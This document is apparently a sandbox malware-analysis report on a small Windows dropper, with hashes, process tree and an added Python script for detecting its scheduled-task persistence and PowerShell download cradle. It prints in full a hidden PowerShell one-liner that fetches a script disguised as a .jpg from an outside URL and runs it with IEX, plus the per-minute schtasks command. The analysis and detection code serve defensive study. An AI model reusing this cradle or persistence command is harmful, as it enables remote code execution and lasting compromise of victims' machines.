Analysis
- max time kernel: 48s
- max time network: 80s
- platform: windows10-2004_x64
- resource: win10v2004-20230703-en
- resource tags: arch:x64, arch:x86, image:win10v2004-20230703-en, locale:en-us, os:windows10-2004-x64, system
- submitted: 07/08/2023, 12:23
Static task: static1
Behavioral task: behavioral1
- Sample: feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe
- Resource: win7-20230712-en
Behavioral task: behavioral2
- Sample: feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe
- Resource: win10v2004-20230703-en
General
- Target: feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe
- Size: 6KB
- MD5: 77421b1f90fc1e9247f693e857e8c429
- SHA1: 63c26635980d5a185a24d1be79c877a1e8507133
- SHA256: feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc
- SHA512: 0bb90e930e0856504631a95792175a149b8565a9acbfdbe68a74e13573e00f1eb433b3c73439523e670b3b66559619c3c85efce9881544f0381afc88e3e8b095
- SSDEEP: 96:1jYUzP8hRH7AKjC2LcS14bqxqsmthY2VxEzNt:Fz8hRb1CNSGJsmjYSu
Malware Config
- Extracted URL: https://a.top4top.net/p_814sg63b2.jpg
  This is the address the PowerShell download cradle in the process tree reads with WebClient.OpenRead and passes to IEX. The .jpg extension is only a disguise for the second-stage script; the content is executed as PowerShell, not rendered as an image.
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Creates scheduled task(s) (1 TTPs, 1 IoCs)
  Schtasks is often used by malware for persistence or to perform post-infection execution. Here the task "Update" is created with /sc minute /mo 1, so C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs is re-launched every minute by the Task Scheduler (see the process tree).
  pid | Process
  4836 | schtasks.exe
- Suspicious use of WriteProcessMemory (2 IoCs)
  Both writes are from the sample (PID 2968) into its own child schtasks.exe (PID 4836). A parent writing into a child it has just spawned is also seen with ordinary process launching, so on its own this is supporting context rather than evidence of injection into an unrelated process.
  description | pid | Process | procid_target
  PID 2968 wrote to memory of 4836 | 2968 | feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe | 81
  PID 2968 wrote to memory of 4836 | 2968 | feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe | 81
Processes
- C:\Users\Admin\AppData\Local\Temp\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe (PID 2968)
  Command line: "C:\Users\Admin\AppData\Local\Temp\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\schtasks.exe (PID 4836)
    Command line: "C:\Windows\System32\schtasks.exe" /create /sc minute /mo 1 /tn "Update" /tr "C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"
    Signatures: Creates scheduled task(s)
- C:\Windows\System32\WScript.exe (PID 2136)
  Command line: C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"
  - C:\Windows\System32\cmd.exe (PID 4296)
    Command line: "C:\Windows\System32\cmd.exe" /c powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID 4572)
      Command line: powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command [System.Net.WebClient]$webClient = New-Object System.Net.WebClient;[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack
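The process tree above is the whole story of this sample: the 6KB dropper registers a per-minute scheduled task pointing at a .vbs in Temp, and each firing of that task runs a hidden PowerShell cradle that fetches a fake .jpg and executes it with IEX. The script below is an added example, not tria.ge output or code from the sample; it shows how to pull those IoCs out of raw process-creation command lines and re-link them into the dropper -> task -> WScript -> cmd -> powershell chain. The event list is constructed from the command lines shown above (ppid is None where the report shows no parent; the WScript.exe instance is started by the Task Scheduler, whose host process is not in the tree), and parse_schtasks, cradle_indicators, ancestry and triage are hypothetical helper names.

```python
"""Triage helpers for schtasks persistence and PowerShell download cradles.

Added example; the EVENTS list is constructed from the command lines in the
report above, not exported from the sandbox.
"""
import json
import re
from typing import Optional

SAMPLE = (r"C:\Users\Admin\AppData\Local\Temp"
          r"\feaf57c2993c580aa9d23610268ca0d88a7ca2f2294e54e11d95efb50a0858bc.exe")
VBS = r"C:\Users\Admin\AppData\Local\Temp\Microsoft32.vbs"
CRADLE = ("powershell -ExecutionPolicy Bypass -windowstyle hidden -noexit -command "
          "[System.Net.WebClient]$webClient = New-Object System.Net.WebClient;"
          "[System.IO.Stream]$stream = $webClient.OpenRead('https://a.top4top.net/p_814sg63b2.jpg');"
          "[System.IO.StreamReader]$sr = New-Object System.IO.StreamReader -argumentList $stream;"
          "[string]$results = $sr.ReadToEnd();IEX $results; hackbacktrack")

# Constructed process-creation events mirroring the report's process tree.
# ppid=None where the report shows no parent (WScript.exe is launched by the
# scheduled task; its Task Scheduler host process is not in the tree).
EVENTS = [
    {"pid": 2968, "ppid": None, "cmdline": f'"{SAMPLE}"'},
    {"pid": 4836, "ppid": 2968,
     "cmdline": f'"C:\\Windows\\System32\\schtasks.exe" /create /sc minute /mo 1 /tn "Update" /tr "{VBS}"'},
    {"pid": 2136, "ppid": None, "cmdline": f'C:\\Windows\\System32\\WScript.exe "{VBS}"'},
    {"pid": 4296, "ppid": 2136, "cmdline": f'"C:\\Windows\\System32\\cmd.exe" /c {CRADLE}'},
    {"pid": 4572, "ppid": 4296, "cmdline": CRADLE},
]

# /sc, /mo, /tn, /tr followed by either a quoted value or a bare token.
_SCHTASKS_ARG = re.compile(r'/(sc|mo|tn|tr)\s+(?:"([^"]*)"|(\S+))', re.IGNORECASE)
_URL = re.compile(r"https?://[^\s'\"();]+", re.IGNORECASE)
_IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif", ".bmp")


def parse_schtasks(cmdline: str) -> Optional[dict]:
    """Extract schedule, repeat modifier, task name and action from a
    'schtasks /create' command line; None if this is not one."""
    if not re.search(r'schtasks(\.exe)?"?\s+/create\b', cmdline, re.IGNORECASE):
        return None
    args = {key.lower(): (quoted if quoted else bare)
            for key, quoted, bare in _SCHTASKS_ARG.findall(cmdline)}
    task = {"schedule": args.get("sc", "").lower(),
            "modifier": int(args["mo"]) if args.get("mo", "").isdigit() else None,
            "task_name": args.get("tn"), "action": args.get("tr")}
    # A task that re-runs a script from a user-writable Temp directory every
    # few minutes is the persistence shape seen in this report.
    task["suspicious"] = (task["schedule"] == "minute" and (task["modifier"] or 0) <= 5
                          and bool(task["action"])
                          and "\\appdata\\local\\temp\\" in task["action"].lower())
    return task


def cradle_indicators(cmdline: str) -> dict:
    """Flag the components of a download-and-execute PowerShell one-liner."""
    low = cmdline.lower()
    urls = _URL.findall(cmdline)
    return {
        "powershell": "powershell" in low,
        "bypass": "-executionpolicy bypass" in low or "-ep bypass" in low,
        "hidden": "-windowstyle hidden" in low or "-w hidden" in low,
        "fetch": any(s in low for s in ("webclient", "downloadstring", "downloadfile",
                                        "openread", "invoke-webrequest", "iwr ")),
        "iex": bool(re.search(r"\b(iex|invoke-expression)\b", low)),
        # Script served under an image extension, as with the .jpg here.
        "disguised_payload": any(u.lower().endswith(_IMAGE_EXT) for u in urls),
        "urls": urls,
    }


def ancestry(pid: int, by_pid: dict) -> list:
    """Walk ppid links upward until a parent is unknown."""
    chain = []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid]["ppid"]
    return chain


def triage(events: list) -> dict:
    """Collect scheduled-task and cradle IoCs and link the task's action
    file to the process that later executes it."""
    by_pid = {e["pid"]: e for e in events}
    out = {"scheduled_tasks": [], "cradles": [], "task_to_script_chain": []}
    for e in events:
        task = parse_schtasks(e["cmdline"])
        if task:
            out["scheduled_tasks"].append({"pid": e["pid"], "parent": e["ppid"], **task})
        ind = cradle_indicators(e["cmdline"])
        if ind["fetch"] and ind["iex"]:
            out["cradles"].append({"pid": e["pid"], "ancestry": ancestry(e["pid"], by_pid), **ind})
    for t in out["scheduled_tasks"]:
        for e in events:  # any other process referencing the action file is the task firing
            if t["action"] and e["pid"] != t["pid"] and t["action"].lower() in e["cmdline"].lower():
                out["task_to_script_chain"].append((t["task_name"], e["pid"]))
    return out


if __name__ == "__main__":
    print(json.dumps(triage(EVENTS), indent=2))
```

Running the triage on the constructed events yields one suspicious task ("Update", every minute, action Microsoft32.vbs in Temp) linked to WScript.exe PID 2136, and two cradle hits (the cmd.exe wrapper 4296 and powershell.exe 4572) whose ancestry resolves back to 2136, with the single extracted URL. Feeding real Sysmon Event ID 1 or EDR process-creation records into the same EVENTS shape is a direct way to hunt for this pattern across a fleet.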
Network
MITRE ATT&CK Enterprise v15
Downloads
- Filesize: 537B
  MD5: 44476af998bf0a5714e3ab100f022a1e
  SHA1: bf26b1f4227b8bfc27d4a7cb2a1cdd4ad224d08e
  SHA256: ef4eae75f800b98fb7c189bd92ba4a1db6d1cc665791634d5ec3c3fe535c1ec2
  SHA512: e02c3d2590f478deafaf3f20c421951c26ccf966817a7299fe2a4ede856190960f1853a4a2907d28f2ff24a357e9d0c039a69d1ee5f53e5c9ffde428d911bd99